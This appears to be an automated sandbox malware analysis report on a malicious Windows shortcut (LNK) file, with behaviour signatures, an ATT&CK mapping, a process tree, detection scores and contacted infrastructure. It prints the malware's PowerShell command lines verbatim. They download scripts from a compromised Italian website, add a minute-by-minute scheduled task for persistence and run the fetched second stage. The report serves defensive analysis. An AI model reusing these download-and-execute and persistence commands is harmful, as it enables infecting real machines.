      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4291
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5564
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4790
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4861
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4592
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4678
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5214
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3389
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160 Thread sleep time: -15679732462653109s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -21213755684765971s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep time: -15679732462653109s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912 Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 576 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: powershell.exe, 00000000.00000002.1375410918.00000207C43AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000C.00000002.1457580508.0000022868EE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1834740805.00000178DB33C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 00000019.00000002.2459821550.000001E4E6D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: amsi64_6652.amsi.csv, type: OTHER
      Source: Yara match File source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -comman [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $kxian4cb6eh1v = new-object net.webclient; $cio = $kxian4cb6eh1v.downloaddata('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php'); $kxian4cb6eh1v.downloadfile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php', 'epztzlyatswrs0.js'); schtasks /create /sc minute /mo 1 /f /tr ([system.text.encoding]::utf8.getstring($cio) + $env:tmp + '\' + ('epztzlyatswrs0.js ' * 2)) /tn e0ovtdel8;
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\ndu462ja8l5m.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn epztzlyatswrs0.js /f; wscript $env:programdata\ndu462ja8l5m.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK matrix (techniques per tactic; a leading number is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 21 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 Exploitation for Client Execution; 2 PowerShell; Launchd; Scheduled Task
Persistence: 1 Scheduled Task/Job; 21 Scripting; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 11 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1567191
Sample: yT6gJFN0SR.lnk
Startdate: 03/12/2024
Architecture: WINDOWS
Score: 100

Node 2 (sample start):
  DNS/IP: www.italialife24.it; italialife24.it
  Signatures: Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 12 other signatures
  Started: wscript.exe [8] 1 1; wscript.exe [11]; wscript.exe [13]; powershell.exe [15] 14 20
Node 8 (wscript.exe):
  Signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
  Started: powershell.exe [18] 16
Node 11 (wscript.exe):
  Started: powershell.exe [20]
Node 13 (wscript.exe):
  Started: powershell.exe [22]
Node 15 (powershell.exe):
  DNS/IP: italialife24.it 46.254.34.201, 443, 49699, 49700 SERVERPLAN-ASIT Italy
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
  Started: conhost.exe [24] 1; schtasks.exe [26] 1
Node 18 (powershell.exe):
  Started: wscript.exe [28]; conhost.exe [31]; schtasks.exe [33] 1
Node 20 (powershell.exe):
  Started: conhost.exe [35]; schtasks.exe [37] 1; wscript.exe [39]
Node 22 (powershell.exe):
  Started: conhost.exe [41]; schtasks.exe [43] 1; wscript.exe [45]
Node 28 (wscript.exe):
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source | Detection | Scanner | Label
yT6gJFN0SR.lnk | 46% | ReversingLabs | Shortcut.Trojan.Pantera
yT6gJFN0SR.lnk | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
https://www.italialife24.it | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1 | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php | 0% | Avira URL Cloud | safe
https://go.micros | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/a | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/au | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-c | 0% | Avira URL Cloud | safe
http://www.italialife24.it | 0% | Avira URL Cloud | safe
http://italialife24.it | 0% | Avira URL Cloud | safe
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
italialife24.it | 46.254.34.201 | true | true | | unknown
www.italialife24.it | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php | true | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php | true | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.italialife24.it | powershell.exe, 00000000.00000002.1355313472.00000207AD6C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022851D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CFDB1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/au | wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php | wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.dr | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000000.00000002.1355313472.00000207ACC62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.000002285167C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C434B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CF69C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000019.00000002.2320094225.000001E4D02C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php | powershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv | wscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.1746599548.000001B9565C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001C.00000002.2338001423.000001F1B24B5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micros | powershell.exe, 0000000C.00000002.1457580508.0000022868EE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1355313472.00000207AD952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC1E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1370494305.00000207BC0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860ACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1447891640.0000022860C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D33A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1825343985.00000178D325E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEAE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2442772033.000001E4DEC19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D0349000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php | powershell.exe, 0000000C.00000002.1457478884.0000022868D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1834579083.00000178DB210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2314205529.000001E4CCA05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.italialife24.it/wp-content | wscript.exe, wscript.exe, 00000018.00000002.2279989400.000001D168195000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/a | wscript.exe, 00000018.00000003.2276654785.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2279915971.000001D168012000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2276802574.000001D168012000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1 | wscript.exe, 0000001C.00000002.2338052164.000001F1B4090000.00000004.00000020.00020000.00000000.sdmp, NDU462JA8L5M.js.12.dr | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1355313472.00000207AC031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022850A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4CEA71000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-c | wscript.exe, 0000000F.00000002.1413160775.000001FB698A5000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000000.00000002.1355313472.00000207AD785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C4836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D00B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://italialife24.it | powershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.italialife24.it | powershell.exe, 00000000.00000002.1355313472.00000207AD67C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1355313472.00000207AD6E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1392811582.0000022852029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1729657654.00000178C47CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2320094225.000001E4D004B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php | powershell.exe, 00000000.00000002.1354882040.00000207AA335000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.254.34.201 | italialife24.it | Italy | 52030 | SERVERPLAN-ASIT | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567191
Start date and time: 2024-12-03 09:14:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: yT6gJFN0SR.lnk
renamed because original name is a hash value
Original Sample Name: d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
Detection: MAL
Classification: mal100.expl.evad.winLNK@28/13@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 7
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6652 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7428 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: yT6gJFN0SR.lnk
Time | Type | Description
03:15:04 | API Interceptor | 119x Sleep call for process: powershell.exe modified
09:15:11 | Task Scheduler | Run new task: e0OvtdEL8 path: wscript s>C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match 46.254.34.201:
  http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe | malicious | Unknown | bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe

Match SERVERPLAN-ASIT:
  6K2g0GMmIE.lnk | malicious | Unknown | 46.254.34.201
  G9eWTvswoH.lnk | malicious | Unknown | 46.254.34.201
  la.bot.mips.elf | malicious | Unknown | 193.70.147.14
  Ordine Electricas BC Corp PO EDC0969388.bat | malicious | GuLoader | 185.81.4.143
  Play_VM-Now(Gdunphy)CQDM.htm | malicious | Unknown | 93.95.216.8
  Steel Dynamics.pdf | malicious | Unknown | 93.95.216.8
  citibank_0824_statement.lnk | malicious | Unknown | 46.254.34.201
  https://www.bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe | malicious | KoiLoader | 46.254.34.201
  http://bellantonicioccolato.it/wp-content/uploads/2020/11/gutweedtE.exe | malicious | Unknown | 46.254.34.201
